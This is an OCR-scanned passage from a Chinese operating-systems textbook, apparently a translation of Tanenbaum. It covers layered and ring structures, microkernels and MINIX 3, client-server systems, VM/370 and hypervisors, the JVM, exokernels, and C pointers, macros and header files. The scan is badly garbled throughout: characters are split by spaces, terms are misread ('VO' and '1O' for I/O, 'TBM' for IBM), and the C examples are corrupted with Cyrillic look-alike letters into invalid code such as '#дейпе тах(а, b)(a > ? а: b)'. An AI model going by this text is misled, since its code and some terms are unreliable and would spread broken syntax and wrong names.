系统 由 一 些 连续 的 进程 所 组 成 ， 编 写 这 些 进程 
时 不 用 再 考虑 在 单 处 理 器 上 多 进程 运行 的 细节 。 也 就 是 说 ， 在 第 0 层 中 提供 了 基本 的 CPU 多 道 程序 功能 。 
内 存 管理 在 第 1 层 中 进行 ， 它 分 配 进程 的 主 存 空间 ， 当 内 存 用 完 时 则 在 一 个 512K 字 的 磁 鼓 上 保留 进 
程 的 一 部 分 (页面 )。 在 第 1 层 上 ， 进 程 不 用 考虑 它 是 在 磁 鼓 上 还 是 在 内 存 中 运行 。 第 1 层 软件 保证 一 旦 
需要 访问 某 一 页 面 时 ， 该 页 面 必定 已 在 内 存 中 。 
第 2 层 处 理 进 程 与 操作 员 控制 台 ( 即 用 户 ) 之 间 的 通信 。 在 这 层 的 上 部 ， 可 以 认为 每 个 进程 都 有 自 
己 的 操作 员 控制 台 。 第 3 层 管理 VO 设 备 和 相关 的 信息 流 缓冲 区 。 在 第 3 层 上 ， 每 个 进程 都 与 有 良好 特性 
的 抽象 1O 设 备 打交道 ， 而 不 必 考 虑 外 部 设备 的 物理 细节 。 第 4 层 是 用 户 程序 层 。 用 户 程序 不 用 考虑 进程 、 
内 存 、 控 制 台 或 1O 设 备 管理 等 细节 。 系 统 操作 员 进程 位 于 第 5 层 中 。 
在 MULTICS 系 统 中 采用 了 更 进一步 的 通用 层次 化 概念 。 MULTICS 由 许多 的 同心 环 构造 而 成 ， 而 不 
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是 采用 层次 化 构造 ， 内 层 环 比 外 层 环 有 更 高 的 级 别 (它们 实际 上 是 一 样 的 )。 当 外 环 的 过 程 欲 调用 内 环 
的 过 程 时 ， 它 必须 执行 一 条 等 价 于 系统 调用 的 TRAP 指 令 。 在 执行 该 TRAP 指 令 前 ， 要 进行 严格 的 参数 
合法 性 检查 。 在 MULTICS 中 ， 尽 管 整个 操作 系统 是 各 个 用 户 进程 的 地 址 空间 的 一 部 分 ， 但 是 硬件 仍 能 
对 单个 过 程 (实际 是 内 存 中 的 一 个 段 ) 的 读 、 写 和 执行 进行 保护 。 

实际 上 ，THE 分 层 方案 只 是 为 设计 提供 了 一 些 方便 ， 因 为 该 系统 的 各 个 部 分 最 终 仍然 被 链接 成 了 完 
整 的 单个 目标 程序 。 而 在 MULTICS 里 ， 环 形 机 制 在 运行 中 是 实际 存在 的 ， 而 且 是 由 硬件 实现 的 。 环 形 
机 制 的 一 个 优点 是 很 容易 扩展 ， 可 用 以 构造 用 户 子 系统 。 例 如 ， 在 一 个 MULTICS 系 统 中 ， 教 授 可 以 写 
一 个 程序 检查 学 生 们 编写 的 程序 并 给 他 们 打分 ， 在 第 “个 环 中 运行 教授 的 程序 ， 而 在 第 n+1 个 环 中 运行 学 
生 的 程序 ， 这 样 学 生 们 就 无 法 自 改 教授 所 给 出 的 成 绩 。 
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在 分 层 方式 中 ， 设 计 者 要 确定 在 哪里 划分 内 核 一 用 户 的 边界 。 在 传统 上 ， 所 有 的 层 都 在 内 核 中 ,但 
是 这 样 做 没有 必要 。 事 实 上 ,， 尽 可 能 减少 内 核 态 中 功能 的 做 法 更 好 ， 因 为 内 核 中 的 错误 会 快速 拖累 系统 。 
相反 ， 可 以 把 用 户 进程 设置 为 具有 较 小 的 权限 ， 这 样 ， 某 一 个 错误 的 后 果 就 不 会 是 致命 的 。 

有 不 少 研究 人 员 对 每 千 行 代码 中 错误 的 数量 进行 了 分 析 (例如 ，Basilli 和 Perricone 1984, 
Ostrand 和 Weyuker，2002)。 代 码 错误 的 密度 取决 于 模块 大 小 、 模 块 寿命 等 ， 不 过 对 一 个 实际 工业 系统 
而 言 ， 每 千 行 代码 中 会 有 10 个 错误 。 这 意味 着 在 有 5 百 万 行 代码 的 单 体操 作 系统 中 ， 大 约 有 50 000 个 内 
核 错误 。 并 不 是 所 有 的 错误 都 是 致命 的 ， 诸 如 给 出 了 不 正确 的 故障 信息 之 类 的 某 些 错误 ， 实 际 是 
很 少 发 生 的 。 无 论 怎样 看 ， 操 作 系统 中 充满 了 错误 ， 所 以 计算 机 制造 商 设置 了 复位 按钮 (通常 在 前 面板 
E), 而 电视 机 、 立 体 音响 以 及 汽车 的 制造 商 们 则 不 这 样 做 ， 尽 管 在 这 些 装 置 中 也 有 大 量 的 软件 。 

在 微 内 核 设 计 背 后 的 思想 是 ， 为 了 实现 高 可 靠 性 ， 将 操作 系统 划分 成 小 的 、 良 好 定义 的 模块 ， 只 有 
其 中 一 个 模块 一 一 微 内 核 一 一 运行 在 内 核 态 上 ， 其 余 的 模块 ， 由 于 功能 相对 弱 些 ， 则 作为 普通 用 户 进程 
运行 。 特 别 地 ， 由 于 把 每 个 设备 驱动 和 文件 系统 分 别 作为 普通 用 户 进程 ， 这 些 模 块 中 的 错误 虽然 会 使 这 
些 模块 崩溃 ， 但 是 不 会 使 得 整个 系统 死机 。 所 以 ， 在 音频 驱动 中 的 错误 会 使 声音 断 续 或 停止 ， 但 是 不 会 
使 整个 计算 机 垮 掉 。 相 反 ， 在 单 体系 统 中 ， 由 于 所 有 的 设备 驱动 都 在 内 核 中 ， 一 个 有 故障 的 音频 驱动 会 
很 容易 引起 对 无 效 地 址 的 引用 ， 从 而 造成 恼人 的 系统 立即 停机 。 

有 许多 微 内 核 已 经 实现 并 投入 应 用 (Accetta 等 人 ，1986，Kirsch 等 人 ，2005，Heiser 等 人 ，2006， 
Herder 等 人 ，2006，Hildebrand，1992，Haertig 等 人 ，1997，Liedtke，1993，1995，1996，Pike 等 人 ， 
1992，Zuberi 等 人 ，1999)。 微 内 核 在 实时 、 工 业 、 航 空 以 及 军事 应 用 中 特别 流行 ， 这 些 领域 都 是 关键 
任务 ， 需 要 有 高 度 的 可 靠 性 。 知 名 的 微 内 核 有 Integrity、K42、L4、PikeOS、QNX、Symbian， 以 及 
MINIX 3 等 。 这 里 对 MINIX 3 做 一 简单 的 介绍 ， 该 操作 系统 把 模块 化 的 思想 推 到 了 极致 ， 它 将 大 部 分 操 
作 系统 分 解 成 许多 独立 的 用 户 态 进程 。MINIX 3 遵守 POSIX， 可 在 www.minix3.org (Herder 等 人 ， 
2006a，Herder 等 人 ，2006b) 站 点 获得 免费 的 开放 源 代码 。 

MINIX 3 微 内 核 只 有 3200 行 C 语 言 代码 和 800 行 用 于 非常 低层 次 功能 的 汇编 语言 代码 , 诸如 捕捉 中 断 、 
进程 切换 等 。C 代 码 管理 和 调度 进程 、 处 理 进程 间 通 信 (在 进程 之 间 传送 信息 )、 提 供 大 约 35 个 内 核 调用 ， 
它们 使 得 操作 系统 的 其 余部 分 可 以 完成 其 工作 。 这 些 调用 完成 诸如 连接 中 断 句柄 、 在 地 址 空间 中 移动 数 
据 以 及 为 新 创建 的 进程 安装 新 的 内 存 映像 等 。MINIX 3 的 进程 结构 如 图 1-26 所 示 ， 其 中 内 核 调用 的 句柄 
用 Sys 标 记 。 时 钟 设备 驱动 也 在 内 核 中 ， 因 为 这 个 驱动 与 调度 器 交互 密切 。 所 有 的 其 他 设备 驱动 都 作为 
单独 的 用 户 进 程 运行 。 

在 内 核 的 外 部 ， 系 统 的 构造 有 三 层 进程 ， 它 们 都 在 用 户 态 中 运行 。 最 底层 中 包含 设备 驱动 器 。 由 于 
它们 在 用 户 态 中 运行 ， 所 以 不 能 物理 地 访问 1/O 端 口 空间 ， 也 不 能 直接 发 出 VO 命令 。 相 反 ， 为 了 能 够 对 
IO 设备 编程 ， 驱 动 器 构建 了 一 个 结构 ， 指 明 哪 个 参数 值 写 到 哪个 1O 端 口 ， 并 生成 一 个 内 核 调 用 ， 通 知 
内 核 完成 写 操作 。 这 个 处 理 意味 着 内 核 可 以 检查 驱动 正在 对 1O 的 读 (或 写 ) 是 否 是 得 到 授权 使 用 的 。 
这 样 ，( 与 单 体 设计 不 同 ) ， 一 个 有 错误 的 音频 驱动 器 就 不 能 够 偶发 性 地 在 硬盘 上 进行 写 操作 。 

在 驱动 器 上 面 是 另 一 用 户 态 层 ， 包 含有 服务 器 ， 它 们 完成 操作 系统 多 数 的 工作 。 有 一 个 或 多 个 文件 
服务 器 管理 着 文件 系统 ， 进 程 管理 器 创建 、 破 坏 和 管理 进程 等 。 通 过 给 服务 器 发 送 短 消息 请 求 POSIX 系 
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统 调 用 的 方式 ， 用 户 程序 获得 操作 系统 的 服务 。 例 如 ， 一 个 需要 调用 read 的 进程 发 送 一 个 消息 给 某 个 文 
件 服务 器 ， 告 知 它 需 要 读 什么 内 容 。 


7 进程 
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有 一 个 有 趣 的 服务 器 ， 称 为 再 生 服 务 器 (reincarnation server) ， 其 任务 是 检查 其 他 服务 器 和 驱动 器 
的 功能 是 否 正确 。 一 旦 检查 出 一 个 错误 ， 它 自动 取代 之 ， 无 须 任何 用 户 的 干预 。 这 种 方式 使 得 系统 具有 
自修 复 能 力 ， 并 且 获 得 了 较 高 的 可 靠 性 。 

系统 对 每 个 进程 的 权限 有 着 许多 限制 。 正 如 已 经 提 及 的 ， 设 备 驱动 器 只 能 与 授权 的 MO 端口 接触 ， 
对 内 核 调 用 的 访问 也 是 按 单个 进程 进行 控制 的 ， 这 是 考虑 到 进程 具有 向 其 他 多 个 进程 发 送 消息 的 能 力 。 
进程 也 可 获得 有 限 的 许可 ， 让 在 内 核 的 其 他 进程 访问 其 地 址 空间 。 例 如 ， 一 个 文件 系统 可 以 为 磁盘 驱动 
器 获得 一 种 允许 ， 核 在 该 文件 系统 的 地 址 空间 内 的 特定 地 址 上 进行 对 盘 块 的 一 个 新 读 操作 。 总 体 来 
说 ， 所 有 这 些 限制 是 让 每 个 驱动 和 服务 器 只 拥有 完成 其 工作 所 需要 的 权限 ， 别 无 其 他 ， 这 样 就 极 大 地 限 
制 了 故障 部 件 可 能 造成 的 危害 。 

一 个 与 小 内 核 相关 联 的 思想 是 在 内 核 中 的 机 制 与 策略 分 离 的 原则 。 为 了 更 清晰 地 说 明 这 一 点 ， 让 我 
们 考虑 进程 调度 。 一 个 比较 简单 的 调度 算法 是 ， 对 每 个 进程 赋予 一 个 优先 级 ， 并 让 内 核 执 行 在 具有 最 高 
优先 级 进程 中 可 以 运行 的 某 个 进程 。 这 里 ， 机 制 ( 在 内 核 中 ) 就 是 寻找 最 高 优先 级 的 进程 并 运行 之 。 而 
策略 (赋予 进程 以 优先 级 ) 可 以 由 用 户 态 中 的 进程 完成 。 在 这 个 方式 中 ， 机 制 和 策略 是 分 离 的 ， 从 而 使 
系统 内 核 变 得 更 小 。 
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-个 微 内 核 思想 的 略微 变 体 是 将 进程 划分 为 两 类 ， 服务 器 ， 每 个 服务 器 提供 某 种 服务 ， 客 户 端 ， 使 
用 这 些 服务 。 这 个 模式 就 是 所 谓 的 客户 机 -服务 器 模式 。 通 常 ， 在 系统 最 底层 是 微 内 核 ， 但 并 不 是 必须 
这 样 的 。 这 个 模式 的 本 质 是 存在 客户 端 进程 和 服务 器 进程 。 

一 般 地 ， 在 客户 端 和 服务 器 之 间 的 通信 是 消息 传递 。 为 了 获得 一 个 服务 ,客户 端 进程 构造 一 段 消息 ， 
说 明 所 需要 的 服务 ， 并 将 其 发 给 合适 的 服务 器 。 该 服务 完成 工作 ， 发 送 回应 。 如 果 客 户 端 和 服务 器 运行 
在 同一 个 机 器 上 ， 则 有 可 能 进行 某 种 优化 ， 但 是 从 概念 上 看 ， 在 这 里 讨论 的 是 消息 传递 。 

这 个 思想 的 一 个 显然 的 、 普 遍 方 式 是 ， 客 户 端 和 服务 器 运行 在 不 同 的 计算 机 上 ， 它 们 通过 局 域 或 
广域网 连接 ， 如 图 1-27 所 示 。 由 于 客户 端 通过 发 送 消息 与 服务 器 通信 ， 客 户 端 并 不 需要 知道 这 些 消息 
是 在 它们 的 本 地 机 器 上 处 理 ， 还 是 通过 网 络 被 送 到 远程 机 器 上 处 理 。 对 于 客户 端 而 言 ， 这 两 种 情形 是 
一 样 的， 都 是 发 送 请 求 并 得 到 回应 。 所 以 ， 客 户 机 一 服务 器 模式 是 一 种 可 以 应 用 在 单机 或 者 网 络 机 器 上 
的 抽象 。 

越 来 越 多 的 系统 ， 包 括 用 户 家 里 的 PC 机 ， 都 成 为 了 客户 端 ， 而 在 某 地 运行 的 大 型 机 器 则 成 为 服务 
器 。 事 实 上 ， 许 多 Web 就 是 以 这 个 方式 运行 的 。 一 台 PC 机 向 某 个 服务 器 请 求 一 个 Web 页 面 ， 而 后 ， 该 
Web 页 面 回 送 。 这 就 是 网 络 中 客户 机 一 服务 器 的 典型 应 用 方式 。 
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消息 从 客户 机 
到 服务 器 


图 1-27 在 网 络 上 的 客户 机 -服务 器 模型 


1.7.5 虚拟 机 

OS / 360 的 最 早 版 本 是 纯粹 的 批 处 理 系统 。 然 而 ， 有 许多 360 用 户 希 望 能 够 在 终端 上 交互 工作 ， 于 
是 在 IBM 公 司 内 外 的 一 些 研究 小 组 决定 为 它 编写 一 个 分 时 系统 。 在 后 来 推出 了 正式 的 IBM 分 时 系统 ， 
TSS / 360。 但 是 它 非常 庞大 ， 运 行 缓慢 ， 于 是 在 花费 了 约 五 千 万 美元 的 研制 费用 后 该 系统 最 后 被 弃 
之 不 用 (Graham，1970) 。 但 是 在 麻 省 剑桥 的 一 个 IBM 研 究 中 心 开 发 了 另 一 个 完全 不 同 的 系统 ， 这 个 系 
统 被 TBM 最 终 用 作为 产品 。 它 的 直接 后 续 ， 称 为 7VM， 目前 在 IBM 的 现 有 大 型 机 上 广泛 使 用 ，zSeries 则 
在 大 型 公司 的 数据 中 心中 广泛 应 用 ， 例 如 ， 作 为 e-commerce 服 务 器 ， 它们 每 秒 可 以 处 理 成 百 上 千 个 事务 ， 
并 使 用 达 数 百 万 G 字 节 的 数据 库 。 

1. УМ/370 

这 个 系统 最 初 被 命名 为 CPICMS， 后 来 改名 为 VM/370 (Seawright 和 MacKinnon，1979 )。 它 是 源 于 
如 下 一 种 机 敏 的 观察 。 分 时 系统 应 该 提供 这 些 功能 ，(1) 多 道 程序 ，(2) 一 个 比 裸 机 更 方便 的 、 有 扩展 
界面 的 计算 机 。VM / 370 存 在 的 目的 是 将 二 者 彻底 地 隔离 开 来 。 

这 个 系统 的 核心 称 为 虚拟 机 监控 程序 
(virtual machine monitor) ， 它 在 裸 机 上 运行 
并 且 具 备 了 多 道 程序 功能 。 该 系统 向 上 层 提 
供 了 若干 台 虚拟 机 ， 如 图 1-28 所 示 。 它 不 同 
于 其 他 操作 系统 的 地 方 是 : 这 些 虚拟 机 不 是 
那 种 具有 文件 等 优良 特征 的 扩展 计算 机 。 与 
之 相反 ， 它 们 仅仅 是 裸 机 硬件 的 精确 复制 品 。 
这 个 复制 品 包含 了 内 核 态 /用 户 态 、IO 功 能 、 图 1-28 配 有 CMS 的 VM/370 结 构 
中 断 及 其 他 真实 硬件 所 应 该 具有 的 全 部 内 容 。 

由 于 每 台 虚 拟 机 都 与 裸 机 相同 ， 所 以 在 每 台 虚 拟 机 上 都 可 以 运行 一 台 裸 机 所 能 够 运行 的 任何 类 型 的 
操作 系统 。 不 同 的 虚拟 机 可 以 运行 不 同 的 操作 系统 ， 而 且 实际 上 往往 就 是 如 此 。 在 早期 的 VM/370 系 统 
上 ， 有 一 些 系统 运 OS / 360 或 其 他 大 型 批 处 理 或 事务 处 理 操作 系统 中 的 某 一 个 ， 而 另 一 些 虚拟 机 运行 
单 用 户 、 交 互 式 系统 供 分 时 用 户 们 使 用 ， 这 个 系统 称 为 会 话 监控 系统 (Conversational Monitor System, 
CMS)。 后 者 在 程序 员 中 很 流行 。 

当 一 个 CMS 程序 执行 系统 调用 时 ， 该 调用 被 陷入 到 其 虚拟 机 的 操作 系统 上 ， 而 不 是 VM/370 上 , 似 
平 它 运行 在 实际 的 机 器 上 ， 而 不 是 在 虚拟 机 上 。 CMS 然 后 发 出 普通 的 硬件 1/O 指 令 读 出 虚拟 磁盘 或 其 他 需 
要 执行 的 调用 。 这 些 IO 指令 由 VM/370 陷 入 ， 然 后 ， 作 为 对 实际 硬件 模拟 的 一 部 分 ， VM/370 完 成 指令 。 
通过 对 多 道 程序 功能 和 提供 扩展 机 器 二 者 的 完全 分 离 ， 每 个 部 分 都 变 得 非常 简单， 非常 灵活 且 容 易 维护 。 

虚拟 机 的 现代 化 身 ，z/VM， 通 常用 于 运行 多 个 完整 的 操作 系统 ， 而 不 是 简化 成 如 CMS 一 样 的 单 用 
户 系统 。 例 如 ，zSeries 有 能 力 随 着 传统 的 IBM 操 作 系统 一 起 ， 运行 一 个 或 多 个 Linux 虚 拟 机 。 

2. 虚拟 机 的 再 次 发 现 

IBM 拥 有 虚拟 机 产品 已 经 有 四 十 年 了 ， 而 有 少数 公司 ， 包 括 Sun Microsystems 公 司 和 Hewlett- 
Packard 等 公司 ， 近 来 也 在 他 们 的 高 端 企业 服务 器 上 增加 对 虚拟 机 的 支持 ， 在 PC 机 上 ， 直 到 最 近 之 前 ， 
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虚拟 化 的 思想 在 很 大 程度 上 被 忽略 了 。 不 过 近年 来 ， 新 的 需求 ， 新 的 软件 和 新 的 技术 的 结合 已 经 使 得 虚 
拟 机 成 为 一 个 热点 。 

首先 看 需求 。 传 统 上 ， 许 多 公司 在 不 同 的 计算 机 上 ， 有 时 还 在 不 同 的 操作 系统 上 ， 运 行 其 邮件 服务 
器 、Web 服 务 器 、FTP 服 务 器 以 及 其 他 服务 器 。 他 们 看 到 虚拟 化 可 以 使 他 们 在 同一 台 机 器 上 运行 所 有 的 
服务 器 ， 而 不 会 由 于 一 个 服务 器 崩溃 ， 就 影响 其 余 的 系统 。 

虚拟 化 在 Web 托 管 世界 里 也 很 流行 。 没 有 虚拟 化 ，Web 托 管 客户 端 只 能 共享 托管 (在 Web 服 务 器 上 
给 客户 端 一 个 账号 ， 但 是 不 能 控制 整个 服务 器 软件 ) 以 及 独占 托管 (提供 客户 端 整个 机 器 ， 这 样 虽然 很 
灵活 ， 但 是 对 于 小 型 或 中 型 Web 站 点 而 言 ， 成 本 效益 比 不 高 )。 当 Web 托 管 公司 提供 租用 虚拟 机 时 ， 一 台 
物理 机 器 就 可 以 运行 许多 虚拟 机 ， 每 个 虚拟 机 看 起 来 都 是 一 台 完全 的 机 器 。 租用 虚拟 机 的 客户 端 可 以 运 
行 自己 想 使 用 的 操作 系统 和 软件 ， 但 是 只 要 支付 独占 一 台 机 器 的 几 分 之 一 的 费用 (因为 同一 台 物 理 机 器 
可 以 同时 支持 多 台 虚 拟 机 ) 。 

虚拟 化 的 另外 一 个 用 途 是 , 为 希望 同时 运行 两 个 或 多 个 操作 系统 ， 比如 Windows 和 Linux 的 最 终 用 户 服务 ， 
某 个 偏好 的 应 用 程序 可 运行 在 一 个 操作 系统 上 ， 而 其 他 的 应 用 程序 可 运行 在 不 同 的 操作 系统 上 。 如 图 1-29a 所 
示 的 情形 ， 而 术语 “虚拟 机 监控 程序 ”近年 来 已 经 变化 成 类 型 1 虚拟 机 管理 程序 (type 1 hypervisor), 


客户 操作 系统 进程 


系统 进程 


| 类型 1 虚拟 机 管理 程序 主机 操作 系统 
а) b) 
图 1-29 а) 类 型 1 虚拟 机 管理 程序 ，b) 类 型 2 虚拟 机 管理 程序 


现在 考察 软件 。 虚 拟 机 的 吸引 力 是 没有 争议 的 ， 问 题 在 于 实现 。 为 了 在 一 台 计算 机 上 运行 虚拟 机 软 
件 ， 其 CPU 必须 被 虚拟 化 (Popek 和 Goldberg，1974) 。 不 过 在 外 过 中 ， 存 在 一 些 问题 。 当 运行 虚拟 机 
(在 用 户 态 中 ) 的 操作 系统 执行 某 个 特权 指令 时 ， 比如 修改 PSW 或 进行 WO 操作 ， 硬 件 实际 上 陷入 到 了 虚 
拟 机 中 ， 这 样 有 关 指令 就 可 以 在 软件 中 模拟 。 在 某 些 CPU 上 (特别 是 Pentium 和 它 的 后 继 者 ， 以 及 其 克 
隆 版 中 ) 试图 在 用 户 态 中 执行 特权 指令 时 ， 会 被 忽略 掉 。 这 样 一 种 特性 ， 使 得 在 这 类 硬件 中 无 法 实现 虚 
拟 机 ， 这 也 解释 了 PC 机 世界 中 ， 缺 乏 对 虚拟 机 兴趣 的 原因 。 当 然 ， 对 于 Pentium 而 言 ， 还 有 解释 器 可 以 
运行 在 Pentium 上， 但 是 其 性 能 丧失 了 5 ~10 倍 ， 这 样 对 于 要 求 高 的 工作 来 说 ， 就 没有 意义 了 。 

由 于 20 世 纪 90 年 代 若 干 学 术 研 究 小 组 的 努力 ， 特别 是 斯 坦 福 大 学 的 Disco (Bugnion A, 1997), 
实现 了 商业 化 产品 (例如 VMware 工 作 站 )， 人 们 对 虚拟 机 的 热情 复兴 了 。VMware 工 作 站 是 类 型 2 虚拟 机 
管理 程序 ， 如 图 1-29b 所 示 。 与 运行 在 裸 机 上 的 类 型 1 虚拟 机 管理 程序 不 同 ， 类 型 2 虚拟 机 管理 程序 作为 
一 个 应 用 程序 运行 在 Windows、Linux 或 其 他 操作 系统 上 ， 这 些 系统 称 为 宿主 机 操作 系统 。 在 类 型 2 管理 
程序 启动 后 ， 它 从 CD-ROM 安 装 盘 中 读 人 供 选 择 的 客体 操作 系统 ， 并 安装 在 一 个 虚拟 盘 上 ， 该 盘 实际 只 
是 宿主 机 操作 系统 文件 系统 中 的 一 个 大 文件 。 

在 客户 端 操作 系统 启动 时 ， 它 完成 在 真实 硬件 上 相同 的 工作 ， 如 启动 一 些 后 台 进程 ， 然 后 是 GUI。 
某 些 管理 程序 一 块 一 块 地 翻译 客户 端 操作 系统 的 二 进 制程 序 ， 代替 含有 管理 程序 调用 的 特定 控制 指令 。 
翻译 后 的 块 可 以 立即 执行 ， 或 者 缓存 起 来 供 后 续 使 用 。 

处 理 控制 指令 的 一 种 不 同方 式 是 ， 修 改 操作 系统 ， 删 掉 它 们 。 这 种 方式 不 是 真正 虚拟 化 ， 而 是 准 虚 
权 化 《paravirtualization) 。 我 们 将 在 第 8 章 具体 讨论 虚拟 化 。 

3.Java 虚 拟 机 

另 一 个 使 用 虚拟 机 的 领域 ， 是 为 了 运行 Java 程 序 ， 但 方式 有 些 不 同 。 在 Sun 公司 发 明 Java 程 序 设计 语言 
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时 ， 也 同时 发 明了 称 为 JVM (Java Virtual Machine) 的 虚拟 机 (一 种 体系 结构 ) Java 编译 器 为 JVM 生 成 代 
码 ， 这 些 代码 以 后 可 以 由 一 个 软件 JVM 解 释 器 执行 。 这 种 处 理 方式 的 优点 在 于 ，JVM 代 码 可 以 通过 Internet 
传送 到 任何 有 JVM 解 释 器 的 计算 机 上 ， 并 在 该 机 器 上 执行 。 举 例 来 说 ， 如 果 编 译 器 生成 了 SPARC 或 Pentium 
二 进 制 代码 ， 这 种 代码 不 可 能 轻易 地 送 到 任何 地 方 就 能 执行 。( 当 然 ，Sun 可 以 生产 一 种 生成 SPARC 二 进 制 
代码 的 编译 器 ， 并 且 发 布 一 种 SPARC 解 释 器 ， 但 是 JVM 具 有 非常 简单 的 、 只 需要 解释 的 体系 结构 。) 使 用 
JVM 的 另 一 种 优点 是 ， 如 果 解 释 器 正确 地 完成 ， 并 不 意味 着 就 结束 了 ， 还 要 对 所 和 输入 的 JVM 进 行 安全 性 检 
查 ， 然 后 在 一 种 保护 环境 下 执行 这样， 这些 程序 就 不 能 偷窃 数据 或 进行 其 他 任何 有 害 的 操作 。 


1.7.6 外 核 

与 虚拟 机 克隆 真实 机 器 不 同 ， 另 一 种 策略 是 对 机 器 进行 分 区 ， 换 名 话说， 给 每 个 用 户 整 个 资源 的 一 个 
子 集 。 这 样 ， 某 一 个 虚拟 机 可 能 得 到 磁盘 的 0 至 1023 盘 块 ， 而 另 一 台 虚 拆 机 会 得 到 1024 至 2047 盘 块 ， 等 等 。 

在 底层 中 ， 一 种 称 为 外 核 (exokernel，Engler 等 人 ，1995) 的 程序 在 内 核 态 中 运行 。 它 的 任务 是 为 
虚拟 机 分 配 资源 ， 并 检查 试图 使 用 这 些 资 源 的 企图 ， 以 确保 没有 机 器 会 使 用 他 人 的 资源 。 每 个 用 户 层 的 
虚拟 机 可 以 运行 自己 的 操作 系统 ， 如 VM/370 和 Pentium 虚 拟 8086 等 ， 但 限制 在 只 能 使 用 已 经 申请 并 且 获 
得 分 配 的 那 部 分 资源 。 

外 核 机 制 的 优点 是 ， 它 减少 了 映像 层 。 在 其 他 的 设计 中 ， 每 个 虚拟 机 都 认为 它 有 自己 的 磁盘 ， 其 盘 
块 号 从 0 到 最 大 编号 ， 这 样 虚拟 机 监控 程序 必须 维护 一 张 表 格 用 以 重 映像 磁盘 地 址 (以 及 其 他 资源 )。 有 
了 外 核 这 个 重 映 像 处 理 就 不 需要 了 。 外 核 只 需要 记录 已 经 分 配给 各 个 虚拟 机 的 有 关 资 源 即 可 。 这 个 方法 
还 有 一 个 优点 ， 它 将 多 道 程序 在 外 核 内 ) 与 用 户 操作 系统 代码 (在 用 户 空间 内 ) 加 以 分 离 ， 而 且 相应 
负载 并 不 重 ， 这 是 因为 外 核 所 做 的 一 切 ， 只 是 保持 多 个 虚拟 机 彼此 不 发 生 冲 突 。 


1.8 依靠 C 的 世界 

操作 系统 通常 是 由 许多 程序 员 写成 的 ， 包 括 很 多 部 分 的 大 型 C (有 时 是 C++) 程序 。 用 于 开发 操作 
系统 的 环境 ， 与 个 人 〈 如 学 生 ) 用 于 编写 小 型 Java 程 序 的 环境 是 非常 不 同 的 。 本 节 试 图 为 那些 有 时 编写 
Jave 的 程序 员 简 要 地 介绍 编写 操作 系统 的 环境 。 
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本 部 分 不 是 C 语 言 的 指南 ， 而 是 一 个 有 关 С 和 Java 之 间 的 关键 差别 的 简要 介绍 。Java 是 基于 C 的 ， 所 
以 两 者 之 间 有 许多 类 似 之 处 。 两 者 都 是 命令 式 的 语言 ， 例 如 ， 有 数据 类 型 、 变 量 和 控制 语句 等 。 在 C 中 
基本 数据 类 型 是 整数 (包括 短 整数 和 长 整数 ) 、 字 符 和 浮 点 数 等 。 使 用 数组 、 结 构 体 和 联合 ， 可 以 构造 
组 合 数据 类 型 。C 语 言 中 的 控制 语句 与 Java 类 似 ， 包 括 这 、switch 、for 以 及 while 等 语句 。 在 这 两 个 语言 
中 ， 函 数 和 参数 大 致 相同 。 

一 项 C 语 言 中 有 的 而 Java 中 没有 的 特点 是 显 式 指针 (explicit pointer)。 指 针 是 一 种 指向 ( 即 包 含 对 
象 的 地 址 ) 一 个 变量 或 数据 结构 的 变量 。 考 虑 下 面 的 语句 

сһагс1, с2, *p; 

с1='с, 

p = &c1， 

с2 = *р, 

这 些 语句 声明 cl 和 c2 是 字符 变量 ， 而 p 是 指向 一 个 字符 的 变量 ( 即 包含 字符 的 地 址 )。 第 一 个 赋值 语句 将 
字符 c 的 ASCII 代 码 存 到 变量 cl 中 。 第 二 个 语句 将 cl 的 地 址 赋 给 指针 变量 p。 第 三 个 语句 将 由 p 指 向 变量 的 
内 容 赋 给 变量 c2， 这 样 ， 在 这 些 语句 执行 之 后 ，c2 也 含有 c 的 ASCII 代 码 。 在 理论 上 ， 指 针 是 输入 类 型 ， 
所 以 不 能 将 浮 点 数 地址 赋 给 一 个 字符 指针 ， 但 是 在 实践 中 ， 编 译 器 接受 这 种 赋值 ， 尽 管 有 时 给 出 一 个 警 
告 。 指 针 是 一 种 非常 强大 的 结构 ， 但 是 如 果 不 仔细 使 用 ， 也 会 是 造成 大 量 错误 的 一 个 原因 。 

C 语 言 中 没有 的 包括 内 建 字符 串 、 线 程 、 包 、 类 、 对 象 、 类 型 安全 (type safety) 以 及 垃圾 回收 
(garbage collection) 等 。 最 后 这 一 个 是 操作 系统 的 一 个 “淋浴 器 塞 子 "。 在 C 中 分 配 的 存储 空间 或 者 是 静态 
的 ， 或 者 是 程序 员 明确 分 配 和 释放 的 ， 通 常 使 用 malloc 以 及 free 库 函数 。 正 是 由 于 后 面 这 个 性 质 一 一 全 部 由 
程序 员 控制 所 有 内 存 一 一 而 且 是 用 明确 的 指针 ， 使 得 C 语 言 对 编写 操作 系统 而 言 非常 有 吸引 力 。 操 作 系统 
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从 一 定 程度 上 来 说 ， 实 际 上 是 个 实时 系统 ， 即 便 通用 系统 也 是 实时 系统 。 当 中 断 发 生 时 ， 操 作 系统 可 能 只 
有 若干 微 秒 去 完成 特定 的 操作 ， 否 则 就 会 丢失 关键 的 信息 。 在 任意 时 刻 启动 垃圾 回收 功能 是 不 可 接受 的 。 


182 头 文件 

一 个 操作 系统 项 目 通 常 包括 多 个 目录 ， 每 个 目录 都 含有 许多 .c 文 件 ， 这 些 文件 中 存 有 系统 某 个 部 分 
的 代码 ， 而 一 些 .h 头 文件 则 包含 供 一 个 或 多 个 代码 文件 使 用 的 声明 以 及 定义 。 头 文件 还 可 以 包括 简单 的 
Ж, ш 

#define BUFFER_SIZE 4096 
安 人 允许 程序 员 命名 常数 ， 这 样 在 代码 中 出 现 的 BUFFER_SIZE， 在 编译 时 该 常数 就 被 数值 4096 所 赫 代 。 
良好 的 C 程 序 设计 实践 应 该 除了 0，1 和 -1 之 外 命名 所 有 的 常数 ， 有 时 把 这 三 个 数 也 进行 命名 。 宏 可 以 附 
带 参数 ， 例 如 

#дейпе тах(а, b)(a > ? а: b) 
这 个 宏 允 许 程序 员 编写 

i= тах, k+1) 
从 而 得 到 

i= ф>к+1?]:К+1) 
将 /与 +1 之 间 的 较 大 者 存储 在 i 中 。 头 文件 还 可 以 包含 条 件 编译 ， 例 如 

#ifdef PENTIUM 

intel_int_ack()， 

#endif 
如 果 宏 PENTIUM 有 定义 ， 而 不 是 其 他 ， 则 编译 进 对 intel_int_ack 函 数 的 调用 。 为 了 分 割 与 结构 有 关 的 代 
码 ， 大 量 使 用 了 条 件 编译 ， 这 样 只 有 当 系 统 在 Pentium 上 编译 时 ， 一 些 特定 的 代码 才 会 被 插入 ， 其 他 的 
